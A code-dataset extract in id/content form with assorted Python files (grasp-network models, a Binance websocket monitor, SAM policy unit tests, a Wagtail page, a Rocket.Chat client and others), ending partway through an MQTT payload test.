id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
11519890
|
from builtins import super
from functools import partial
import torch
import torch.nn as nn
import torch.nn.functional as F
from scipy import ndimage
from vgn.ConvONets.conv_onet.config import get_model
def get_network(name):
    """Instantiate a network architecture by name.

    Args:
        name: Case-insensitive architecture identifier; one of
            "vgn", "giga_aff", "giga", "giga_geo", "giga_detach".

    Returns:
        A freshly constructed (untrained) network instance.

    Raises:
        KeyError: if `name` is not a known architecture (with a message
            listing the valid choices, instead of a bare key).
    """
    models = {
        "vgn": ConvNet,
        "giga_aff": GIGAAff,
        "giga_geo": GIGAGeo,
        "giga_detach": GIGADetach,
        "giga": GIGA,
    }
    key = name.lower()
    if key not in models:
        # Still a KeyError for backward compatibility, but actionable.
        raise KeyError(
            "Unknown network name '{}'; expected one of {}".format(name, sorted(models))
        )
    return models[key]()
def load_network(path, device, model_type=None):
    """Construct the neural network and load parameters from the specified file.

    Args:
        path: Path to the model parameters (a pathlib.Path; `.stem` is used).
            The name must conform to `vgn_name_[_...]` when `model_type` is None.
        device: torch device the parameters are mapped onto.
        model_type: Optional explicit architecture name; when None the name is
            inferred from the file name.

    Returns:
        The network with loaded weights, moved to `device`.
    """
    if model_type is None:
        model_name = '_'.join(path.stem.split("_")[1:-1])
    else:
        model_name = model_type
    # Bug fix: report the name actually used — `model_type` may be None here,
    # which previously printed "Loading [None] model from ...".
    print(f'Loading [{model_name}] model from {path}')
    net = get_network(model_name).to(device)
    net.load_state_dict(torch.load(path, map_location=device))
    return net
def conv(in_channels, out_channels, kernel_size):
    """Unit-stride 3-D convolution with 'same' padding (odd kernels preserve spatial size)."""
    same_padding = kernel_size // 2
    return nn.Conv3d(in_channels, out_channels, kernel_size, padding=same_padding)
def conv_stride(in_channels, out_channels, kernel_size):
    """3-D convolution with stride 2 (halves each spatial dim) and 'same'-style padding."""
    return nn.Conv3d(
        in_channels,
        out_channels,
        kernel_size,
        stride=2,
        padding=kernel_size // 2,
    )
class ConvNet(nn.Module):
    """Volumetric grasp network: strided encoder, upsampling decoder, and three
    per-voxel output heads (quality, 4-channel rotation, width).
    """

    def __init__(self):
        super().__init__()
        self.encoder = Encoder(1, [16, 32, 64], [5, 3, 3])
        self.decoder = Decoder(64, [64, 32, 16], [3, 3, 5])
        # One 5x5x5 'same' convolution per prediction head.
        self.conv_qual = conv(16, 1, 5)
        self.conv_rot = conv(16, 4, 5)
        self.conv_width = conv(16, 1, 5)

    def forward(self, x):
        features = self.decoder(self.encoder(x))
        # Quality squashed to (0, 1); the 4-channel rotation output is
        # L2-normalized along the channel axis (presumably a quaternion —
        # confirm against the training code).
        qual_out = torch.sigmoid(self.conv_qual(features))
        rot_out = F.normalize(self.conv_rot(features), dim=1)
        width_out = self.conv_width(features)
        return qual_out, rot_out, width_out
def GIGAAff():
    """Build the GIGA-Aff variant: affordance decoder only (no TSDF branch)."""
    encoder_kwargs = dict(
        plane_type=['xz', 'xy', 'yz'],
        plane_resolution=40,
        unet=True,
        unet_kwargs=dict(depth=3, merge_mode='concat', start_filts=32),
    )
    decoder_kwargs = dict(dim=3, sample_mode='bilinear', hidden_size=32, concat_feat=True)
    config = dict(
        encoder='voxel_simple_local',
        encoder_kwargs=encoder_kwargs,
        decoder='simple_local',
        decoder_tsdf=False,
        decoder_kwargs=decoder_kwargs,
        padding=0,
        c_dim=32,
    )
    return get_model(config)
def GIGA():
    """Build the full GIGA model: affordance decoder plus a TSDF decoder."""
    encoder_kwargs = dict(
        plane_type=['xz', 'xy', 'yz'],
        plane_resolution=40,
        unet=True,
        unet_kwargs=dict(depth=3, merge_mode='concat', start_filts=32),
    )
    decoder_kwargs = dict(dim=3, sample_mode='bilinear', hidden_size=32, concat_feat=True)
    config = dict(
        encoder='voxel_simple_local',
        encoder_kwargs=encoder_kwargs,
        decoder='simple_local',
        decoder_tsdf=True,
        decoder_kwargs=decoder_kwargs,
        padding=0,
        c_dim=32,
    )
    return get_model(config)
def GIGAGeo():
    """Build the GIGA-Geo variant: geometry (TSDF) branch only (`tsdf_only`)."""
    encoder_kwargs = dict(
        plane_type=['xz', 'xy', 'yz'],
        plane_resolution=40,
        unet=True,
        unet_kwargs=dict(depth=3, merge_mode='concat', start_filts=32),
    )
    decoder_kwargs = dict(dim=3, sample_mode='bilinear', hidden_size=32, concat_feat=True)
    config = dict(
        encoder='voxel_simple_local',
        encoder_kwargs=encoder_kwargs,
        decoder='simple_local',
        decoder_tsdf=True,
        tsdf_only=True,
        decoder_kwargs=decoder_kwargs,
        padding=0,
        c_dim=32,
    )
    return get_model(config)
def GIGADetach():
    """Build the GIGA-Detach variant: TSDF branch present but detached
    (`detach_tsdf`), so its gradients do not flow into the shared encoder."""
    encoder_kwargs = dict(
        plane_type=['xz', 'xy', 'yz'],
        plane_resolution=40,
        unet=True,
        unet_kwargs=dict(depth=3, merge_mode='concat', start_filts=32),
    )
    decoder_kwargs = dict(dim=3, sample_mode='bilinear', hidden_size=32, concat_feat=True)
    config = dict(
        encoder='voxel_simple_local',
        encoder_kwargs=encoder_kwargs,
        decoder='simple_local',
        decoder_tsdf=True,
        detach_tsdf=True,
        decoder_kwargs=decoder_kwargs,
        padding=0,
        c_dim=32,
    )
    return get_model(config)
class Encoder(nn.Module):
    """Three stride-2 3-D conv layers, each followed by ReLU (8x downsampling)."""

    def __init__(self, in_channels, filters, kernels):
        super().__init__()
        channels = [in_channels] + list(filters)
        self.conv1 = conv_stride(channels[0], channels[1], kernels[0])
        self.conv2 = conv_stride(channels[1], channels[2], kernels[1])
        self.conv3 = conv_stride(channels[2], channels[3], kernels[2])

    def forward(self, x):
        for layer in (self.conv1, self.conv2, self.conv3):
            x = F.relu(layer(x))
        return x
class Decoder(nn.Module):
    """Three 'same' conv+ReLU stages, upsampling to spatial sizes 10, 20, 40."""

    def __init__(self, in_channels, filters, kernels):
        super().__init__()
        channels = [in_channels] + list(filters)
        self.conv1 = conv(channels[0], channels[1], kernels[0])
        self.conv2 = conv(channels[1], channels[2], kernels[1])
        self.conv3 = conv(channels[2], channels[3], kernels[2])

    def forward(self, x):
        # Each stage: conv, ReLU, then interpolate up to the target size
        # (40 matches the network's input resolution).
        for layer, size in ((self.conv1, 10), (self.conv2, 20), (self.conv3, 40)):
            x = F.interpolate(F.relu(layer(x)), size)
        return x
# Resnet Blocks
class ResnetBlockFC(nn.Module):
    """Fully connected ResNet block: out = shortcut(x) + fc_1(relu(fc_0(relu(x)))).

    Args:
        size_in (int): input dimension
        size_out (int): output dimension (defaults to size_in)
        size_h (int): hidden dimension (defaults to min(size_in, size_out))
    """

    def __init__(self, size_in, size_out=None, size_h=None):
        super().__init__()
        size_out = size_in if size_out is None else size_out
        size_h = min(size_in, size_out) if size_h is None else size_h
        self.size_in, self.size_h, self.size_out = size_in, size_h, size_out

        self.fc_0 = nn.Linear(size_in, size_h)
        self.fc_1 = nn.Linear(size_h, size_out)
        self.actvn = nn.ReLU()
        # Identity shortcut when dimensions match; learned projection otherwise.
        self.shortcut = (
            None if size_in == size_out else nn.Linear(size_in, size_out, bias=False)
        )
        # Zero-init the last layer's weight so the residual starts near zero.
        nn.init.zeros_(self.fc_1.weight)

    def forward(self, x):
        hidden = self.fc_0(self.actvn(x))
        residual = self.fc_1(self.actvn(hidden))
        base = x if self.shortcut is None else self.shortcut(x)
        return base + residual
def count_num_trainable_parameters(net):
    """Total element count over all parameters of `net` with requires_grad=True."""
    total = 0
    for param in net.parameters():
        if param.requires_grad:
            total += param.numel()
    return total
|
11519970
|
import os
import sys
import time
import signal
from models.exchange.binance import WebSocketClient as BWebSocketClient
def cls():
    """Clear the terminal, on both Windows ("cls") and POSIX ("clear")."""
    command = "cls" if os.name == "nt" else "clear"
    os.system(command)
def signal_handler(signum, frame):
    """Handler installed during shutdown; on SIGINT (2) just asks the user to wait."""
    if signum != 2:  # 2 == SIGINT
        return
    print(" -> not finished yet!")
# Stream live 1-minute BTCUSDT candles from Binance and print a status
# snapshot whenever a new websocket message has arrived.
try:
    websocket = BWebSocketClient(["BTCUSDT"], "1m")
    websocket.start()
    message_count = 0
    while True:
        if websocket:
            # Only redraw when a new message arrived AND ticker data exists.
            if (
                message_count != websocket.message_count
                and websocket.tickers is not None
            ):
                cls()
                print(f"Start time: {websocket.getStartTime()}")
                print(f"Time elapsed: {websocket.getTimeElapsed()} seconds")
                print("\nMessageCount =", "%i \n" % websocket.message_count)
                print(websocket.tickers)
                message_count = websocket.message_count
        time.sleep(5)  # output every 5 seconds, websocket is realtime
# catches a keyboard break of app, exits gracefully
except KeyboardInterrupt:
    # Install the "please wait" handler so repeated Ctrl-C doesn't kill us
    # while the websocket threads shut down.
    signal.signal(signal.SIGINT, signal_handler)
    print("\nPlease wait while threads complete gracefully.")
    websocket.close()
    sys.exit(0)
|
11519975
|
from CoreUtils.NmapAPI import Nmapper
def Port_Scan(target, port, scan_type):
    """Run an nmap scan of `port` on `target` using the given scan type."""
    Nmapper().Scan(target, port, scan_type)
|
11520027
|
import sys
import numpy as np
import pandas as pd
from scipy import sparse
import itertools
import os
import CoEmbedding
# Paths to the preprocessed 20 Newsgroups inputs for the co-embedding run.
DATA_DIR = '/media/O_o/UB/research/dataset/20newsgroups/CoEmbedding/'
dwmatrix_pt = DATA_DIR+'dw_matrix.csv'
vocab_pt = DATA_DIR+'vocab.txt'
# Corpus dimensions: document count and vocabulary size.
n_docs = 18827
n_words = 20678
def tfidf(D, normalize=True):
    """TF-IDF weight a sparse document-word count matrix.

    Args:
        D: scipy.sparse matrix of shape (num_docs, num_words) with raw counts.
        normalize: if True, apply sublinear TF scaling (log(count) + 1).
            NOTE: this mutates D.data in place (preserved from the original).

    Returns:
        scipy.sparse.csr_matrix of tf * idf weights.
    """
    # Generalization: derive the document count from the matrix itself
    # instead of the module-level global `n_docs` (identical for this file,
    # but makes the function usable on any matrix).
    num_docs = D.shape[0]
    tf = D.toarray()
    tf[tf > 0] = 1  # binary term presence for document frequency
    idf = np.sum(tf, axis=0, keepdims=True)
    idf = np.log(num_docs / idf)
    if normalize:
        D.data = np.log(D.data) + 1  # sublinear term-frequency scaling
        tf = D.toarray()
    return sparse.csr_matrix(tf * idf)
# Load matrix D: binary doc-word occurrences from CSV coordinates, then
# TF-IDF weight it.
tp = pd.read_csv(dwmatrix_pt)
rows, cols = np.array(tp['doc_id']), np.array(tp['word_id'])
matrixD = sparse.csr_matrix((np.ones_like(rows), (rows, cols)), dtype=np.int16, shape=(n_docs, n_words))
matrixD = tfidf(matrixD, normalize=True)
# Load matrix W: word-word co-occurrence counts stored as raw CSR arrays.
data = np.load(os.path.join(DATA_DIR, 'coordinate_co_binary_data.npy'))
indices = np.load(os.path.join(DATA_DIR, 'coordinate_co_binary_indices.npy'))
indptr = np.load(os.path.join(DATA_DIR, 'coordinate_co_binary_indptr.npy'))
matrixW = sparse.csr_matrix((data, indices, indptr), shape=(n_words, n_words))
# Report shapes and density of both matrices.
print(matrixD.shape, matrixW.shape)
print(float(matrixD.nnz) / np.prod(matrixD.shape))
print(float(matrixW.nnz) / np.prod(matrixW.shape))
def get_row(Y, i):
    """Return (start, end, values, column indices) for row `i` of CSR matrix `Y`."""
    start, end = Y.indptr[i], Y.indptr[i + 1]
    return start, end, Y.data[start:end], Y.indices[start:end]
# Per-word co-occurrence totals and the grand total of pairs.
count = np.asarray(matrixW.sum(axis=1)).ravel()
n_pairs = matrixW.data.sum()
#constructing the SPPMI matrix
M = matrixW.copy()
for i in range(n_words):
    lo, hi, d, idx = get_row(M, i)
    # PMI(w, c) = log( #(w,c) * |pairs| / (#(w) * #(c)) ), row by row.
    M.data[lo:hi] = np.log(d * n_pairs / (count[i] * count[idx]))
    #M.data[lo:hi] = (n_pairs*d)/(count[idx]*n_words)
print(max(M.data))
print(M[0,0])
# Clamp negative PMI to zero (positive PMI) and drop explicit zeros.
M.data[M.data < 0] = 0
M.eliminate_zeros()
print(float(M.nnz) / np.prod(M.shape))
#Now $M$ is the PPMI matrix. Depending on the number of negative examples $k$, we can obtain the shifted PPMI matrix as $\max(M_{wc} - \log k, 0)$
# number of negative samples
k_ns = 1
M_ns = M.copy()
if k_ns > 1:
    offset = np.log(k_ns)
else:
    offset = 0.
# Shifted PPMI: subtract log(k) and clamp at zero again.
M_ns.data -= offset
M_ns.data[M_ns.data < 0] = 0
M_ns.eliminate_zeros()
print(np.sum(np.absolute(M_ns))/np.prod(M_ns.shape))
#start training
# Hyperparameters for the co-embedding model (regularization weights lam_*,
# confidence weights c0/c1, K topics, 50-dim embeddings).
n_embeddings = 50
max_iter = 20
n_jobs = 8
c0 = 1
c1 = 1
K = 20
lam_sparse_d = 1e-2
lam_sparse = 1e-7
lam_d = 0.5
lam_w = 1
lam_t = 50
save_dir = os.path.join(DATA_DIR, 'results_parallel')
wukong = CoEmbedding.CoEmbedding(n_embeddings=n_embeddings, K=K, max_iter=max_iter, batch_size=1000, init_std=0.01, n_jobs=n_jobs,
                                 random_state=98765, save_params=True, save_dir=save_dir, verbose=True,
                                 lam_sparse_d=lam_sparse_d, lam_sparse=lam_sparse, lam_d=lam_d, lam_w=lam_w, lam_t=lam_t, c0=c0, c1=c1)
wukong.fit(matrixD, M_ns, vocab_pt)
#print(wukong.alpha)
#print(wukong.beta)
#print(wukong.gamma)
# Dump topic words/embeddings and sanity-check nearest neighbors.
topicfile = DATA_DIR + 'topicmodeling/ourtwords.txt'
topicembeddingfile = DATA_DIR + 'topicmodeling/ourtembeddings.txt'
np.savetxt(topicembeddingfile, wukong.alpha)
print(wukong.show_save_topics(10, topicfile))
print(wukong.topic_similarity())
print(wukong.most_similar('car', 15))
print(wukong.most_similar('hockey', 15))
print(wukong.most_similar('israel', 15))
print(wukong.most_similar('jesus', 15))
|
11520029
|
from typing import TYPE_CHECKING
from itests.pages.base import BasePage
if TYPE_CHECKING:
from selenium.webdriver.remote.webelement import WebElement
from typing import List
class PermissionCreatePage(BasePage):
    """Page object wrapping the permission-creation form."""

    @property
    def allowed_patterns(self):
        # type: () -> List[str]
        container = self.find_element_by_id("allowed-patterns")
        elements = container.find_elements_by_tag_name("strong")
        return [element.text for element in elements]

    @property
    def form(self):
        # type: () -> WebElement
        return self.find_element_by_id("permission-create-form")

    def set_description(self, description):
        # type: (str) -> None
        self.form.find_element_by_name("description").send_keys(description)

    def set_name(self, name):
        # type: (str) -> None
        self.form.find_element_by_name("name").send_keys(name)
|
11520047
|
from django.db import models
from django.http import Http404
from wagtail.core.models import Page
from wagtail.core.fields import RichTextField
from wagtail.admin.edit_handlers import FieldPanel
class HomePage(Page):
    """Home page that also serves an AMP rendition under an `amp/` URL prefix."""

    body = RichTextField(blank=True)

    def route(self, request, path_components):
        # An 'amp' prefix selects the AMP rendition of the routed page.
        is_amp_request = bool(path_components) and path_components[0] == 'amp'
        if is_amp_request:
            # Strip the prefix so normal routing can locate the real page.
            path_components = path_components[1:]
        page, args, kwargs = super(HomePage, self).route(
            request, path_components
        )
        if is_amp_request:
            # Serve the AMP template if the page supports it, else 404.
            if not hasattr(page, 'get_template_amp'):
                raise Http404
            kwargs['is_amp_request'] = is_amp_request
        return page, args, kwargs

    content_panels = Page.content_panels + [
        FieldPanel('body', classname="full"),
    ]

    parent_page_types = ['wagtailcore.Page']
|
11520092
|
from cloudfn.pubsub import handle_pubsub_event
import jsonpickle
def pubsub_handler(message):
    """Log the incoming Pub/Sub message as JSON."""
    # Bug fix: `print jsonpickle.encode(message)` is Python-2 syntax and a
    # SyntaxError under Python 3; print is a function.
    print(jsonpickle.encode(message))

handle_pubsub_event(pubsub_handler)
|
11520101
|
from mock import Mock, patch
from unittest import TestCase
from samtranslator.model.function_policies import FunctionPolicies, PolicyTypes, PolicyEntry
from samtranslator.model.exceptions import InvalidTemplateException
class TestFunctionPolicies(TestCase):
    """Unit tests for FunctionPolicies: ingestion of the `Policies` property,
    policy-type detection (managed policy / statement / template / unknown),
    and handling of `Fn::If` intrinsics.

    Bug fix applied below: the three `test_get_type_with_intrinsic_if_must_
    return_*` tests used `self.assertTrue(expected, actual)`, where the second
    argument is only the failure *message* — those assertions always passed.
    They now use `assertEqual` so the comparison is actually performed.
    """

    def setUp(self):
        self.policy_template_processor_mock = Mock()
        self.is_policy_template_mock = Mock()
        self.function_policies = FunctionPolicies({}, self.policy_template_processor_mock)
        self.function_policies._is_policy_template = self.is_policy_template_mock

    @patch.object(FunctionPolicies, "_get_policies")
    def test_initialization_must_ingest_policies_from_resource_properties(self, get_policies_mock):
        resource_properties = {}
        dummy_policy_results = ["some", "policy", "statements"]
        expected_length = 3

        get_policies_mock.return_value = dummy_policy_results
        function_policies = FunctionPolicies(resource_properties, self.policy_template_processor_mock)

        get_policies_mock.assert_called_once_with(resource_properties)
        self.assertEqual(expected_length, len(function_policies))

    @patch.object(FunctionPolicies, "_get_policies")
    def test_get_must_yield_results_on_every_call(self, get_policies_mock):
        resource_properties = {}  # Just some input
        dummy_policy_results = ["some", "policy", "statements"]
        expected_results = ["some", "policy", "statements"]

        # Setup _get_policies to return these dummy values for testing
        get_policies_mock.return_value = dummy_policy_results
        function_policies = FunctionPolicies(resource_properties, self.policy_template_processor_mock)

        # `list()` will implicitly call the `get()` repeatedly because it is a generator
        self.assertEqual(list(function_policies.get()), expected_results)

    @patch.object(FunctionPolicies, "_get_policies")
    def test_get_must_yield_no_results_with_no_policies(self, get_policies_mock):
        resource_properties = {}  # Just some input
        dummy_policy_results = []
        expected_result = []

        # Setup _get_policies to return these dummy values for testing
        get_policies_mock.return_value = dummy_policy_results
        function_policies = FunctionPolicies(resource_properties, self.policy_template_processor_mock)

        # `list()` will implicitly call the `get()` repeatedly because it is a generator
        self.assertEqual(list(function_policies.get()), expected_result)

    def test_contains_policies_must_work_for_valid_input(self):
        resource_properties = {"Policies": "some managed policy"}
        self.assertTrue(self.function_policies._contains_policies(resource_properties))

    def test_contains_policies_must_ignore_resources_without_policies(self):
        resource_properties = {"some key": "value"}
        self.assertFalse(self.function_policies._contains_policies(resource_properties))

    def test_contains_policies_must_ignore_non_dict_resources(self):
        resource_properties = "some value"
        self.assertFalse(self.function_policies._contains_policies(resource_properties))

    def test_contains_policies_must_ignore_none_resources(self):
        resource_properties = None
        self.assertFalse(self.function_policies._contains_policies(resource_properties))

    def test_contains_policies_must_ignore_lowercase_property_name(self):
        # Property names are case sensitive
        resource_properties = {"policies": "some managed policy"}
        self.assertFalse(self.function_policies._contains_policies(resource_properties))

    def test_get_type_must_work_for_managed_policy(self):
        policy = "managed policy is a string"
        expected = PolicyTypes.MANAGED_POLICY

        result = self.function_policies._get_type(policy)
        self.assertEqual(result, expected)

    @patch("samtranslator.model.function_policies.is_intrinsic")
    def test_get_type_must_work_for_managed_policy_with_intrinsics(self, is_intrinsic_mock):
        policy = {"Ref": "somevalue"}
        expected = PolicyTypes.MANAGED_POLICY
        is_intrinsic_mock.return_value = True

        result = self.function_policies._get_type(policy)
        self.assertEqual(result, expected)

    def test_get_type_must_work_for_policy_statements(self):
        policy = {"Statement": "policy statements have a 'Statement' key"}
        expected = PolicyTypes.POLICY_STATEMENT

        result = self.function_policies._get_type(policy)
        self.assertEqual(result, expected)

    def test_get_type_must_work_for_policy_templates(self):
        policy = {"PolicyTemplate": "some template"}
        self.is_policy_template_mock.return_value = True
        expected = PolicyTypes.POLICY_TEMPLATE

        result = self.function_policies._get_type(policy)
        self.assertEqual(result, expected)

    def test_get_type_must_ignore_invalid_policy(self):
        policy = {"not-sure-what-this-is": "value"}
        # This is also not a policy template
        self.is_policy_template_mock.return_value = False
        expected = PolicyTypes.UNKNOWN

        result = self.function_policies._get_type(policy)
        self.assertEqual(result, expected)

    def test_get_type_must_ignore_invalid_policy_value_list(self):
        policy = ["invalid", "policy"]
        expected = PolicyTypes.UNKNOWN
        self.is_policy_template_mock.return_value = False

        result = self.function_policies._get_type(policy)
        self.assertEqual(result, expected)
        self.is_policy_template_mock.assert_called_once_with(policy)

    def test_get_policies_must_return_all_policies(self):
        policies = [
            "managed policy 1",
            {"Ref": "some managed policy"},
            {"Statement": "policy statement"},
            {"PolicyTemplate": "some value"},
            ["unknown", "policy"],
        ]
        resource_properties = {"Policies": policies}
        self.is_policy_template_mock.side_effect = [True, False]  # Return True for policy template, False for the list

        expected = [
            PolicyEntry(data="managed policy 1", type=PolicyTypes.MANAGED_POLICY),
            PolicyEntry(data={"Ref": "some managed policy"}, type=PolicyTypes.MANAGED_POLICY),
            PolicyEntry(data={"Statement": "policy statement"}, type=PolicyTypes.POLICY_STATEMENT),
            PolicyEntry(data={"PolicyTemplate": "some value"}, type=PolicyTypes.POLICY_TEMPLATE),
            PolicyEntry(data=["unknown", "policy"], type=PolicyTypes.UNKNOWN),
        ]

        result = self.function_policies._get_policies(resource_properties)
        self.assertEqual(result, expected)

    def test_get_policies_must_ignore_if_resource_does_not_contain_policy(self):
        resource_properties = {}
        expected = []

        result = self.function_policies._get_policies(resource_properties)
        self.assertEqual(result, expected)

    def test_get_policies_must_ignore_if_policies_is_empty(self):
        resource_properties = {"Policies": []}
        expected = []

        result = self.function_policies._get_policies(resource_properties)
        self.assertEqual(result, expected)

    def test_get_policies_must_work_for_single_policy_string(self):
        resource_properties = {"Policies": "single managed policy"}
        expected = [PolicyEntry(data="single managed policy", type=PolicyTypes.MANAGED_POLICY)]

        result = self.function_policies._get_policies(resource_properties)
        self.assertEqual(result, expected)

    def test_get_policies_must_work_for_single_dict_with_managed_policy_intrinsic(self):
        resource_properties = {"Policies": {"Ref": "some managed policy"}}
        expected = [PolicyEntry(data={"Ref": "some managed policy"}, type=PolicyTypes.MANAGED_POLICY)]

        result = self.function_policies._get_policies(resource_properties)
        self.assertEqual(result, expected)

    def test_get_policies_must_work_for_single_dict_with_policy_statement(self):
        resource_properties = {"Policies": {"Statement": "some policy statement"}}
        expected = [PolicyEntry(data={"Statement": "some policy statement"}, type=PolicyTypes.POLICY_STATEMENT)]

        result = self.function_policies._get_policies(resource_properties)
        self.assertEqual(result, expected)

    def test_get_policies_must_work_for_single_dict_of_policy_template(self):
        resource_properties = {"Policies": {"PolicyTemplate": "some template"}}
        self.is_policy_template_mock.return_value = True
        expected = [PolicyEntry(data={"PolicyTemplate": "some template"}, type=PolicyTypes.POLICY_TEMPLATE)]

        result = self.function_policies._get_policies(resource_properties)
        self.assertEqual(result, expected)
        self.is_policy_template_mock.assert_called_once_with(resource_properties["Policies"])

    def test_get_policies_must_work_for_single_dict_of_invalid_policy_template(self):
        resource_properties = {"Policies": {"InvalidPolicyTemplate": "some template"}}
        self.is_policy_template_mock.return_value = False  # Invalid policy template
        expected = [PolicyEntry(data={"InvalidPolicyTemplate": "some template"}, type=PolicyTypes.UNKNOWN)]

        result = self.function_policies._get_policies(resource_properties)
        self.assertEqual(result, expected)
        self.is_policy_template_mock.assert_called_once_with({"InvalidPolicyTemplate": "some template"})

    def test_get_policies_must_work_for_unknown_policy_types(self):
        resource_properties = {"Policies": [1, 2, 3]}
        expected = [
            PolicyEntry(data=1, type=PolicyTypes.UNKNOWN),
            PolicyEntry(data=2, type=PolicyTypes.UNKNOWN),
            PolicyEntry(data=3, type=PolicyTypes.UNKNOWN),
        ]
        self.is_policy_template_mock.return_value = False

        result = self.function_policies._get_policies(resource_properties)
        self.assertEqual(result, expected)

    def test_is_policy_template_must_detect_valid_policy_templates(self):
        template_name = "template_name"
        policy = {template_name: {"Param1": "foo"}}

        self.policy_template_processor_mock.has.return_value = True
        function_policies = FunctionPolicies({}, self.policy_template_processor_mock)

        self.assertTrue(function_policies._is_policy_template(policy))
        self.policy_template_processor_mock.has.assert_called_once_with(template_name)

    def test_is_policy_template_must_ignore_non_dict_policies(self):
        policy = [1, 2, 3]

        self.policy_template_processor_mock.has.return_value = True
        function_policies = FunctionPolicies({}, self.policy_template_processor_mock)

        self.assertFalse(function_policies._is_policy_template(policy))
        self.policy_template_processor_mock.has.assert_not_called()

    def test_is_policy_template_must_ignore_none_policies(self):
        policy = None

        function_policies = FunctionPolicies({}, self.policy_template_processor_mock)
        self.assertFalse(function_policies._is_policy_template(policy))

    def test_is_policy_template_must_ignore_dict_with_two_keys(self):
        template_name = "template_name"
        policy = {template_name: {"param1": "foo"}, "A": "B"}

        self.policy_template_processor_mock.has.return_value = True
        function_policies = FunctionPolicies({}, self.policy_template_processor_mock)

        self.assertFalse(function_policies._is_policy_template(policy))

    def test_is_policy_template_must_ignore_non_policy_templates(self):
        template_name = "template_name"
        policy = {template_name: {"param1": "foo"}}

        self.policy_template_processor_mock.has.return_value = False
        function_policies = FunctionPolicies({}, self.policy_template_processor_mock)

        self.assertFalse(function_policies._is_policy_template(policy))
        self.policy_template_processor_mock.has.assert_called_once_with(template_name)

    def test_is_policy_template_must_return_false_without_the_processor(self):
        policy = {"template_name": {"param1": "foo"}}

        function_policies_obj = FunctionPolicies({}, None)  # No policy template processor

        self.assertFalse(function_policies_obj._is_policy_template(policy))
        self.policy_template_processor_mock.has.assert_not_called()

    def test_get_type_with_intrinsic_if_must_return_managed_policy_type(self):
        managed_policy = {"Fn::If": ["SomeCondition", "some managed policy arn", "other managed policy arn"]}
        no_value_if = {"Fn::If": ["SomeCondition", {"Ref": "AWS::NoValue"}, "other managed policy arn"]}
        no_value_else = {"Fn::If": ["SomeCondition", "other managed policy arn", {"Ref": "AWS::NoValue"}]}
        expected_managed_policy = PolicyTypes.MANAGED_POLICY

        # Was assertTrue(expected, actual) — always passed; now a real comparison.
        self.assertEqual(expected_managed_policy, self.function_policies._get_type(managed_policy))
        self.assertEqual(expected_managed_policy, self.function_policies._get_type(no_value_if))
        self.assertEqual(expected_managed_policy, self.function_policies._get_type(no_value_else))

    def test_get_type_with_intrinsic_if_must_return_policy_statement_type(self):
        policy_statement = {
            "Fn::If": ["SomeCondition", {"Statement": "then statement"}, {"Statement": "else statement"}]
        }
        no_value_if = {"Fn::If": ["SomeCondition", {"Ref": "AWS::NoValue"}, {"Statement": "else statement"}]}
        no_value_else = {"Fn::If": ["SomeCondition", {"Statement": "then statement"}, {"Ref": "AWS::NoValue"}]}
        expected_policy_statement = PolicyTypes.POLICY_STATEMENT

        # Was assertTrue(expected, actual) — always passed; now a real comparison.
        self.assertEqual(expected_policy_statement, self.function_policies._get_type(policy_statement))
        self.assertEqual(expected_policy_statement, self.function_policies._get_type(no_value_if))
        self.assertEqual(expected_policy_statement, self.function_policies._get_type(no_value_else))

    def test_get_type_with_intrinsic_if_must_return_policy_template_type(self):
        policy_template = {
            "Fn::If": [
                "SomeCondition",
                {"template_name_one": {"Param1": "foo"}},
                {"template_name_one": {"Param1": "foo"}},
            ]
        }
        no_value_if = {"Fn::If": ["SomeCondition", {"Ref": "AWS::NoValue"}, {"template_name_one": {"Param1": "foo"}}]}
        no_value_else = {"Fn::If": ["SomeCondition", {"template_name_one": {"Param1": "foo"}}, {"Ref": "AWS::NoValue"}]}
        expected_policy_template = PolicyTypes.POLICY_TEMPLATE

        self.policy_template_processor_mock.has.return_value = True
        function_policies = FunctionPolicies({}, self.policy_template_processor_mock)

        # Was assertTrue(expected, actual) — always passed; now a real comparison.
        self.assertEqual(expected_policy_template, function_policies._get_type(policy_template))
        self.assertEqual(expected_policy_template, function_policies._get_type(no_value_if))
        self.assertEqual(expected_policy_template, function_policies._get_type(no_value_else))

    def test_get_type_with_intrinsic_if_must_raise_exception_for_bad_policy(self):
        policy_too_few_values = {"Fn::If": ["condition", "then"]}
        policy_too_many_values = {"Fn::If": ["condition", "then", "else", "extra"]}

        self.assertRaises(InvalidTemplateException, self.function_policies._get_type, policy_too_few_values)
        self.assertRaises(InvalidTemplateException, self.function_policies._get_type, policy_too_many_values)

    def test_get_type_with_intrinsic_if_must_raise_exception_for_different_policy_types(self):
        policy_one = {"Fn::If": ["condition", "then", {"Statement": "else"}]}
        policy_two = {"Fn::If": ["condition", {"Statement": "then"}, "else"]}

        self.assertRaises(InvalidTemplateException, self.function_policies._get_type, policy_one)
        self.assertRaises(InvalidTemplateException, self.function_policies._get_type, policy_two)
|
11520114
|
import logging
from rocketchat.calls.base import RocketChatBase
logger = logging.getLogger(__name__)
class GetUsers(RocketChatBase):
    """Call the Rocket.Chat `users.list` REST endpoint and flatten the result."""

    endpoint = '/api/v1/users.list'

    def build_endpoint(self):
        """Return the fixed endpoint (no query parameters)."""
        return self.endpoint

    def post_response(self, result):
        """Extract a simplified list of user dicts from the API response.

        Returns whatever was collected before an error, so a malformed
        response yields an empty (or partial) list rather than raising.
        """
        users = []
        try:
            _users = result.get('users')
            for user in _users:
                users.append({
                    'name': user.get('name'),
                    'emails': [email['address'] for email in user.get('emails')],
                    'username': user.get('username'),
                    'type': user.get('type'),
                    'status': user.get('status'),
                    'roles': user.get('roles'),
                    'id': user.get('_id'),
                })
        except Exception as e:
            # Bug fix: the message previously said "public rooms" (copy-paste
            # from another call) even though this endpoint fetches users.
            logger.error('Exception in fetching users {e}'.format(
                e=e
            ), exc_info=True)
        return users
|
11520120
|
# MicroPython-specific deque tests (`ucollections.deque` is not CPython's).
from ucollections import deque
# maxlen=1: appending a second item silently evicts the oldest one.
d = deque((), 1)
d.append(1)
d.append(2)
assert d.popleft() == 2
# A third constructor argument (flags=1) switches overflow behavior:
# appending past maxlen raises IndexError instead of evicting.
d = deque((), 1, 1)
d.append(1)
try:
    d.append(2)
    assert False
except IndexError:
    pass
|
11520130
|
import pytest
from paho.mqtt.client import MQTTMessage
from HABApp.mqtt.mqtt_payload import get_msg_payload
# Each (payload, expected) pair checks that MQTT payloads are cast to the
# matching Python value: None/bool literals (both cases), ints, floats,
# plain strings passed through unchanged, and raw bytes decoded to str.
@pytest.mark.parametrize(
    'payload, expected', (
        ('none', None),
        ('None', None),
        ('true', True),
        ('True', True),
